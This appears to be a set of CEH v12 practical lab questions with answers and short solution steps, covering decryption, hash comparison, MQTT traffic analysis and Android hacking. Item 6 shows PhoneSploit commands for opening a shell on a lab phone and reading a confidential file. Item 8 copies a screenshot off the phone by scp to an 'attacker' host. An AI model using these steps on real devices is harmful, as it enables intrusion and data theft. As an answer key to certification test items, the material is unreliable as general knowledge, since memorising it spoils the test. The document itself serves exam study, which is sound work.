1.An attacker has intruded into the CEHORG network with malicious intent. He has identified a vulnerability in a machine. He has encoded the machine's IP address and left it in the database. While auditing the database, the encoded file was identified by the database admin. Decode the EncodedFile.txt file in the Document folder in the "EH Workstation – 2" machine and enter the IP address as the answer. (Hint: Password to decode the file is Pa$$w0rd)
10.10.10.31-(Correct Attempt)

use BCTextEncoder, copy the text in ENCODED box and enter the password to decrypt Pa$$w0rd


2.The Access code of an employee was stolen from the CEHORG database. The attacker has encrypted the file using the Advance Encryption Package. You have been assigned a task to decrypt the file; the organization has retained the cipher file ""AccessCode.docx.aes"" in the Document folder in the ""EH Workstation – 2"" machine. Determine the access code by decrypting the file. Hint: Use ""qwerty"" as the decryption password. Note: Advanced Encryption Package is available at E:\CEH-Tools\CEHv12 Module 20 Cryptography\Cryptography Tools.
ECC-CSC-2006-(Correct Attempt)

used AES-TOOL 2.7 and demark (enter key as hex), put the password qwerty and input file AccessCode.docx.aes



3.A VeraCrypt volume file "secret" is stored on the Document folder in the "EH Workstation – 2" machine. You are an ethical hacker working with CEHORG; you have been tasked to decrypt the encrypted volume and determine the number of files stored in the volume. (Hint: Password: test)
6-(Correct Attempt)

use VeraCrypt, click right in Drive H and Selec File an Mount, write the password test


4.You have received a folder named "Archive" from a vendor. You suspect that someone might have tampered with the files during transmission. The Original hashes of the files have been sent by the sender separately and are stored in a file named FileHashes.txt stored in the Document folder in the "EH Workstation – 2" machine. Your task is to check the integrity of the files by comparing the MD5 hashes. Compare the hash values and determine the file name that has been tampered with. Note: Exclude the file extension in the answer field. The answer is case-sensitive.
Quotes-(Correct Attempt)

use HashMyFiles, open Folder and compare hashes

5.CEHORG hosts multiple IoT devices and sensors to manage its supply chain fleet. You are assinged a task to examine the file "IOT Traffic.pcapng" located in the Home directory of the root user in the "EH Workstation - 1" machine. Analyze the packet and find the topic of the message sent to the sensor.
Fleet_Count-(Correct Attempt)

use Wireshark / Protocol MQTT /Info(Publish Message) / MQ Telemetry Transport protocol / Header / Topic



6.An employee in CEHORG has secretly acquired Confidential access ID through an application from the company. He has saved this information on the Downloads folder of his Android mobile phone. You have been assigned a task as an ethical hacker to access the file and delete it covertly. Enter the account information present in the file. Note: Only provide the numeric values in the answer field.
Answer
80099889-(Correct Attempt)
python3 phonesploit.py
Option 3 to conect
172.16.0.21
Option 4 to shell
172.16.0.21
cd sdcard/
cd Download/
cat confidential.txt


7.The mobile device of an employee in CEHORG has been hacked by the hacker to perform DoS attack on one of the server in company network. You are assigned to analyse "Andro.pcapng" located in Documents directory of EH workstation-2 and identify the severity level of the attack. (Note: perform deep down Expert Info analysis)
Warning-(Correct Attempt)

use Wireshark / Analyze / Expert Information



8.An attacker has hacked one of the employees android device in CEHORG and initiated LOIC attack from the device. You are an ethical hacker who had obtained a screenshot of the attack using a background application. Obtain the screenshot of the attack using PhoneSploit from the attacked mobile device and determine the targeted machine IP along with send method.
NNN.NN.N.NN/AAAA
172.16.0.11/HTTP-(Correct Attempt)

activar el ssh para transferir archivos 
sudo systemctl start ssh
sudo systemctl status ssh
sudo systemctl enable ssh
cd sdcard
cd DCIM
scp capture.png attacker@10.10.1.10:/home/attacker/


9.An attacker installed a malicious mobile application 'AntiMalwarescanner.apk' on the victims android device which is located in EH workstation-2 documents folder. You are assigned a task to perform security audit on the mobile application and find out whether the application using permission to Read-call-logs.
Yes-(Correct Attempt)
sisik.eu/apk-tool


10. An ex-employee of CEHORG is suspected to be performing insider attack. You are assigned a task to attain KEYCODE-75 used in the employees' mobile phone. Note: use option p in PhoneSploit for next page.
AAAAAAAAAA
APOSTROPHE-(Correct Attempt)

phonesploit option 24


11.CEHORG hosts multiple IOT devices and sensors to manage its supply chain fleet. You are assinged a task to examine the file "IOT Traffic.pcapng" located in the Home directory of the root user in the "EH Workstation - 1" machine. Analyze the packet and find the topic of the message sent to the sensor.
Aaaaa_Aaaaa
use Wireshark / Protocol MQTT /Info(Publish Message) / MQ Telemetry Transport protocol / Header / Topic


12.CEHORG hosts multiple IOT devices and network sensors to manage its IT-department. You are assigned a task to examine the file "NetworkNS_Traffic.pcapng" located in the Documents folder of the user in the "EH Workstation - 2" machine. Analyze the packet and find the alert message sent to the sensor.
Aaaa Aaa*aa *aaaa
Data Bre@ch @lert-(Correct Attempt)

use Wireshark / Protocol MQTT /Info(Publish Message) / MQ Telemetry Transport protocol / Header / Topic


13.An attacker had sent a message 166.150.247.183/US to the victim. You are assigned to perform footprinting using shodan.io in order to identify whether the message belongs to SCADA/ICS/IoT systems in US.
AaA



14.An attacker had sent a file cryt-128-06encr.hex containing ransom file password, which is located in documents folder of EH-workstation-2. You are assigned a task to decrypt the file using cryp tool. Perform cryptanalysis, Identify the algorithm used for file encryption and hidden text. Note: check filename for key length and hex characters.